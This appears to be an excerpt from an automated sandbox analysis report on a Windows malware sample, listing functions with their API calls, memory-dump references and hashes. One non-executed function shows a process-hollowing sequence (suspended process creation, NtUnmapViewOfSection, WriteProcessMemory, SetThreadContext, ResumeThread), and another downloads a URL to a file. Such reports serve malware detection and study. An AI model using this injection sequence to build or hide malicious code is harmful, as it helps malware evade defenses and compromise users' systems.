                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 2b52be854e3110c668572c4d6d076ceef3108c3483ef152501289d8236a4ae5f
                                          • Instruction ID: a0c6a893f49520be2f4fec6f2f0adf309e2d3c293cc21a632c6a9bd0b39045d4
                                          • Opcode Fuzzy Hash: 2b52be854e3110c668572c4d6d076ceef3108c3483ef152501289d8236a4ae5f
                                          • Instruction Fuzzy Hash: 118179316102055BFB1AEB38DC85BEEBB66EF96310F14861CF5859B2D5D739CA80CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0100574C, Relevance: 3.3, APIs: 2, Instructions: 273COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 0100574F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: ba679153ca3f115817c93d2ed95753e5624e9b493cde67625ef17f3f82e991d0
                                          • Instruction ID: 9969cf8fd694a6bda97ef2f4a7ae1f3400398508abcb729b589956bea16ca235
                                          • Opcode Fuzzy Hash: ba679153ca3f115817c93d2ed95753e5624e9b493cde67625ef17f3f82e991d0
                                          • Instruction Fuzzy Hash: 17819A316102059BFB1AEB38CC88BEE7A66AF95310F14861CF5C49B2D1D739DA80CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01005873, Relevance: 3.3, APIs: 2, Instructions: 272COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 01005876
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 87068f19eebb29db1f813a5862ed30eb94bcfd8625481d5ca010c81f95d63b77
                                          • Instruction ID: 9ab29f4698e55fb1f03a3ce9fe90d0e862e38ecae698e028c9cdd09fe3cfaef5
                                          • Opcode Fuzzy Hash: 87068f19eebb29db1f813a5862ed30eb94bcfd8625481d5ca010c81f95d63b77
                                          • Instruction Fuzzy Hash: 0E817A31A001055BFB1DEB78CC88BEE7A66AF56310F54861CF5C49B2D5D739DA80CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0100599A, Relevance: 3.3, APIs: 2, Instructions: 271COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 0100599D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: be349605d71bc7d54129c2a0edbb138ddd060d3764ba89c740f12228970f8314
                                          • Instruction ID: 62374c646ac8632a7d19346cfe26a4af00192b8cf3ee7ec766914653d5671506
                                          • Opcode Fuzzy Hash: be349605d71bc7d54129c2a0edbb138ddd060d3764ba89c740f12228970f8314
                                          • Instruction Fuzzy Hash: 948189316002055BFB1AEB38CC89BEE7A66EF96310F14861CF5C48B2D5D739DA80CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01007F93, Relevance: 3.2, APIs: 2, Instructions: 186COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateDirectoryA.KERNELBASE(?,00000000), ref: 01007FA5
                                          • GetFileAttributesA.KERNELBASE(?), ref: 01007FB7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesCreateDirectoryFile
                                          • String ID:
                                          • API String ID: 3401506121-0
                                          • Opcode ID: 4ea59f69ac0dbef850c124f9df334c678d91eda8cf4f2954ec616ea565cc1407
                                          • Instruction ID: 04aef57b5303b2f63a22d0fd9851adb8cc3747c6765fb6ed6c8c398e5e21d81d
                                          • Opcode Fuzzy Hash: 4ea59f69ac0dbef850c124f9df334c678d91eda8cf4f2954ec616ea565cc1407
                                          • Instruction Fuzzy Hash: FF518A71E001095BFB0AEA7CCC85BEDBB2AFF85220F648619F9C4A72C1D735D9814B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010151DE, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 53e3327dba3442658012c0631043b9005c4d1921e189060fabaae0c4da5b7928
                                          • Instruction ID: b28a9701675c57fb10bc77f1ce0491d171577c607ca80250045ce517470dc7bd
                                          • Opcode Fuzzy Hash: 53e3327dba3442658012c0631043b9005c4d1921e189060fabaae0c4da5b7928
                                          • Instruction Fuzzy Hash: 6FE0ED3360581282E262763E7C452FA16D9ABC7331F110326F4E4CE0CCEFBE44024295
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01005BAE, Relevance: 1.8, APIs: 1, Instructions: 298COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: PathTempVersion
                                          • String ID:
                                          • API String ID: 261301950-0
                                          • Opcode ID: cd53306f684e4ffda576f00397b3fe945057c86ff51119c0b8bca43e3acce8b4
                                          • Instruction ID: 09b0c3bb28fcbaf4f9c13bc1042a376b71a608d821d46cb2a8ca66e40691d3a7
                                          • Opcode Fuzzy Hash: cd53306f684e4ffda576f00397b3fe945057c86ff51119c0b8bca43e3acce8b4
                                          • Instruction Fuzzy Hash: 7891A931A002056BFB1AEB38CC89BEE7A66EF51310F14861CF5C49B2D1D779CA80CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101645F, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: b6d45e6bb48f8cc11922ccc21fe053cff1f5d15c2bdf907683777c7423822a33
                                          • Instruction ID: 9935f2f8c9e8550b854cfb0d6d63f4e6ef98bacd914d36bb415c357aa3c69319
                                          • Opcode Fuzzy Hash: b6d45e6bb48f8cc11922ccc21fe053cff1f5d15c2bdf907683777c7423822a33
                                          • Instruction Fuzzy Hash: F7111871A0410AAFCF15DF98E9409DA7BF5EF48304F044099F809AB351DA75D911CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01017B94, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0101AD8F: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01017094,00000001,00000364,00000006,000000FF,?,?,0101320C,01016627,?,?,010156FE), ref: 0101ADD0
                                          • _free.LIBCMT ref: 01017C03
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: 8bedc48bd71ed51189256198d5362878c3b97d26ee5e3fae265640fe63e848fe
                                          • Instruction ID: 7993247d40d95944afb29886315a80115d588f3800eac0621dca50fd0c176b95
                                          • Opcode Fuzzy Hash: 8bedc48bd71ed51189256198d5362878c3b97d26ee5e3fae265640fe63e848fe
                                          • Instruction Fuzzy Hash: FF01F972604356ABC3229F58C8819D9FBD8FB05370F15066DE585A76C0E7746C11C7E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010123FB, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ac35988d4f62eb19bd12ff3c09ffffb1682d500d0be95884ae34b2de8b987a0
                                          • Instruction ID: 9c8212d6e656e77e4c284b584796afac5f52e65fa9251bb7646f030b5bbd8261
                                          • Opcode Fuzzy Hash: 3ac35988d4f62eb19bd12ff3c09ffffb1682d500d0be95884ae34b2de8b987a0
                                          • Instruction Fuzzy Hash: B3F078320816015BC6223B6DDC04BEA36A89F62334F200725E8F0831D8DFBEE4028AE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101DB6A, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 9ba8c6d62c837557b7d10db139ff9f6489b14aed1980b721ae02a396919f42ec
                                          • Instruction ID: ff8fffeaad9f9857a79ca5adfc06f9b285217931cc19cb7728d7258fb3166952
                                          • Opcode Fuzzy Hash: 9ba8c6d62c837557b7d10db139ff9f6489b14aed1980b721ae02a396919f42ec
                                          • Instruction Fuzzy Hash: 57018F72C0015AFFCF01AFE88C049EE7FF5BF08210F140165F955E21A4E6358A20DB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101AD8F, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01017094,00000001,00000364,00000006,000000FF,?,?,0101320C,01016627,?,?,010156FE), ref: 0101ADD0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: df70fbfbfcd11526aedc5516ab494931ca582eb97107cd4d96c2491976cdbffa
                                          • Instruction ID: f377d7c8d1bc50d53540ff24fc414a9e1d91f474d480d7cfbe8ff79ececc978d
                                          • Opcode Fuzzy Hash: df70fbfbfcd11526aedc5516ab494931ca582eb97107cd4d96c2491976cdbffa
                                          • Instruction Fuzzy Hash: 51F0BB31302965EBE7613A6A8904BAA3F99AF41672F454151ED86DB18CCB2CD40082A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101EFE6, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 01016AEA: RtlAllocateHeap.NTDLL(00000000,?,?,?,0101B9A2,00000220,?,?,?,?,?,?,01013272,?), ref: 01016B1C
                                          • _free.LIBCMT ref: 0101F006
                                            • Part of subcall function 01016601: HeapFree.KERNEL32(00000000,00000000,?,010156FE), ref: 01016617
                                            • Part of subcall function 01016601: GetLastError.KERNEL32(?,?,010156FE), ref: 01016629
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Heap$AllocateErrorFreeLast_free
                                          • String ID:
                                          • API String ID: 314386986-0
                                          • Opcode ID: e31687b0696c3f2db9b249426d633b7df06f1fcefd9f490092ffbd371ce83635
                                          • Instruction ID: 6119b9d2f264b40089381e646d8510c9226a2c870f4de20946207717d4936fbb
                                          • Opcode Fuzzy Hash: e31687b0696c3f2db9b249426d633b7df06f1fcefd9f490092ffbd371ce83635
                                          • Instruction Fuzzy Hash: 42F062721057019FD3359F45D801B96F7ECEF54712F10842FE29A87590DAF9A4458B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01016AEA, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,0101B9A2,00000220,?,?,?,?,?,?,01013272,?), ref: 01016B1C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 6d368237a1e7d640c2b1489e98c0abc2a5305c5c7eda8690aa6f3e055e8edca9
                                          • Instruction ID: 0dbca43d887c11cdcff17f900080cdc5ade755d4ca4ada4279845fc9edcc6772
                                          • Opcode Fuzzy Hash: 6d368237a1e7d640c2b1489e98c0abc2a5305c5c7eda8690aa6f3e055e8edca9
                                          • Instruction Fuzzy Hash: 0EE0E531241116AAEA712A6D9C54F9A3ECCBB523A0F0101A4FDC496188EBEEE84082A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101D8B1, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,00000000,?,0101DCA1,?,?,00000000,?,0101DCA1,00000000,0000000C), ref: 0101D8CE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: e65343360482a45224eda8ad26847f513845b21c71d762ba5fd1d96e2796089b
                                          • Instruction ID: 8abfbc73830343cb8d614cff16db42f874eb580bf335960c3a62cd36148abdd1
                                          • Opcode Fuzzy Hash: e65343360482a45224eda8ad26847f513845b21c71d762ba5fd1d96e2796089b
                                          • Instruction Fuzzy Hash: DCD06C3200010DBFDF128E84DC06EDA3BAAFB48714F114000FA5856020C736E861EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 01002250, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 155injectionthreadmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 0100226C
                                          • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 010022C5
                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 010022DE
                                          • GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 010022F3
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 01002316
                                          • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,00000000), ref: 0100232E
                                          • GetProcAddress.KERNEL32(00000000), ref: 01002335
                                          • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 01002354
                                          • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 0100236F
                                          • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 010023AC
                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 010023DC
                                          • SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 010023F2
                                          • ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 010023FB
                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 01002409
                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 01002420
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                          • String ID: NtUnmapViewOfSection$ntdll.dll
                                          • API String ID: 4033543172-1050664331
                                          • Opcode ID: 71611116d094ddab2b6996fdd76c18bd737b0cbaf2bdeb051f8ff5f0173d9e00
                                          • Instruction ID: d259c52e184152f2ab11283bd528a097d26d22c3d06593355c20d7e53667de8d
                                          • Opcode Fuzzy Hash: 71611116d094ddab2b6996fdd76c18bd737b0cbaf2bdeb051f8ff5f0173d9e00
                                          • Instruction Fuzzy Hash: 2E516B75A40305EBEB319F94DC89FAABBB8FF08705F204064F648EA1C0D7B9A554CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01006980, Relevance: 10.6, APIs: 7, Instructions: 105networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,6FA2FB10), ref: 010069B5
                                          • InternetOpenA.WININET(0102CD15,00000000,00000000,00000000,00000000), ref: 010069CA
                                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 010069EA
                                          • InternetReadFile.WININET(00000000,?,00010000,00010000), ref: 01006A01
                                          • CloseHandle.KERNEL32(00000000), ref: 01006A43
                                          • InternetCloseHandle.WININET(?), ref: 01006A52
                                          • InternetCloseHandle.WININET(00000000), ref: 01006A55
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Internet$CloseHandle$FileOpen$CreateRead
                                          • String ID:
                                          • API String ID: 4113138902-0
                                          • Opcode ID: 6ae6029c8af41ae22763e67a058abd1d6ab78e9c45f057c60ae7613e027ed26c
                                          • Instruction ID: d36788574d0a70476a31758e8f47e8dca62b2559b809b32112d732287ad18355
                                          • Opcode Fuzzy Hash: 6ae6029c8af41ae22763e67a058abd1d6ab78e9c45f057c60ae7613e027ed26c
                                          • Instruction Fuzzy Hash: BD31B671340209BBFB21DF64CC85FDE3BA9EB49710F604119FA84971C1D7B9E9948B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01004010, Relevance: 7.7, APIs: 5, Instructions: 212COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersionExW.KERNEL32(0000011C), ref: 01004066
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Version
                                          • String ID:
                                          • API String ID: 1889659487-0
                                          • Opcode ID: bfbe9b56af32fb859374d88c7afb5ed3811ad6db4fbe668169b8b40c8781ff11
                                          • Instruction ID: 70b5baedcce4eb25ce50bdbe034d718051d639e768cca8c86246e2e055d9143e
                                          • Opcode Fuzzy Hash: bfbe9b56af32fb859374d88c7afb5ed3811ad6db4fbe668169b8b40c8781ff11
                                          • Instruction Fuzzy Hash: EB611671E092099BFB32DA68EC453EDBBF4EB51314F50029AED84D72C5E77A498087C5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101E94F, Relevance: 4.7, APIs: 3, Instructions: 171timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0102B608), ref: 0101E9B9
                                          • _free.LIBCMT ref: 0101E9A7
                                            • Part of subcall function 01016601: HeapFree.KERNEL32(00000000,00000000,?,010156FE), ref: 01016617
                                            • Part of subcall function 01016601: GetLastError.KERNEL32(?,?,010156FE), ref: 01016629
                                          • _free.LIBCMT ref: 0101EB73
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                          • String ID:
                                          • API String ID: 2155170405-0
                                          • Opcode ID: e68d49e5c85383565d2904e3ffeb7c36dfd800016481e3c251d15d0279c49d30
                                          • Instruction ID: 898e60736a60a9795f4d1a70ea452fc7318d7398ea005b47022aaf1f1a4affba
                                          • Opcode Fuzzy Hash: e68d49e5c85383565d2904e3ffeb7c36dfd800016481e3c251d15d0279c49d30
                                          • Instruction Fuzzy Hash: A7512B72D002169BDB22FF69CC849EE7BFCBF49310B1405AAE9D1D7188E77999408B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01014AA3, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 01014B9B
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 01014BA5
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 01014BB2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 31b5920ef16923dfb64e6ea3e2e23d4e4fc3b7ed982a40cb324e4baa4c66b3e5
                                          • Instruction ID: bd0df1ce85ad832dd0673f950631517ab72753a21657c048fa32980a237a4997
                                          • Opcode Fuzzy Hash: 31b5920ef16923dfb64e6ea3e2e23d4e4fc3b7ed982a40cb324e4baa4c66b3e5
                                          • Instruction Fuzzy Hash: 6631C57490122D9BCB61DF28D9887CDBBB8BF18310F6041DAE44CA7294E7749B858F44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0101B0C2, Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.662066092.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                          • Associated: 00000003.00000002.662020284.0000000001000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662207715.0000000001027000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662239596.0000000001030000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.662252157.0000000001035000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c0ac8d2f34032f4b85cf047587933d899a5a25b60f6023b615102090ab362c3d
                                          • Instruction ID: be288d82a45c11002c9ffe18995e70532e98efdf9016bfd46094eddb03b33ba8
                                          • Opcode Fuzzy Hash: c0ac8d2f34032f4b85cf047587933d899a5a25b60f6023b615102090ab362c3d
                                          • Instruction Fuzzy Hash: 8141A2B180421DAFDB61DF69CC88AEABBB9EF45300F1442D9E49DD3214DB399E848F50
                                          Uniqueness
